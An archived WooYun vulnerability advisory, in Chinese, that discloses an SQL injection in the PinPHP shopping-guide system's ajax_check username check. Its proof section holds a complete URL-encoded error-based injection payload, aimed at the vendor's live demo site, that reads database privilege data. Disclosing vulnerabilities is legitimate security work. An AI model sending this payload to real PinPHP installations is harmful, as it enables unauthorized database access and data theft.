当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049689

漏洞标题:pinphp导购系统存在sql注入漏洞(白盒分析)

相关厂商:pinphp

漏洞作者: Aring

提交时间:2014-01-24 11:29

修复时间:2014-04-24 11:30

公开时间:2014-04-24 11:30

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-04-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

PinPHP是一套基于LAMP架构(Linux+PHP+MySQL+Apache/Nginx)的、免费的、开源系统,它通过山寨Pinterest的瀑布流的业务模式与优点,整合第三方的电子商务淘宝客、CPS联盟以及网盟的数据。为广大站长提供一套快速建立一个社会化的电子商务导购平台及信息分享平台。

详细说明:

版本号:PinPHPv3_release_20121207
userAction.class.php ajax_check()方法

1.png


继续跟入:userModel.class.php

2.png


漏洞证明:

测试官网演示站点:

http://demo.pinphp.com/?a=ajax_check&clientid=J_username&J_username=demo%27%20AND%20%28SELECT%205494%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x7167667571,%28SELECT%20MID%28%28IFNULL%28CAST%28grantee%20AS%20CHAR%29,0x20%29%29,1,50%29%20FROM%20INFORMATION_SCHEMA.USER_PRIVILEGES%20LIMIT%2045,1%29,0x7177746f71,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27OiDp%27=%27OiDp&m=user&type=username&_=139030609295


3.png

修复方案:

加强过滤,你们更专业

版权声明:转载请注明来源 Aring@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝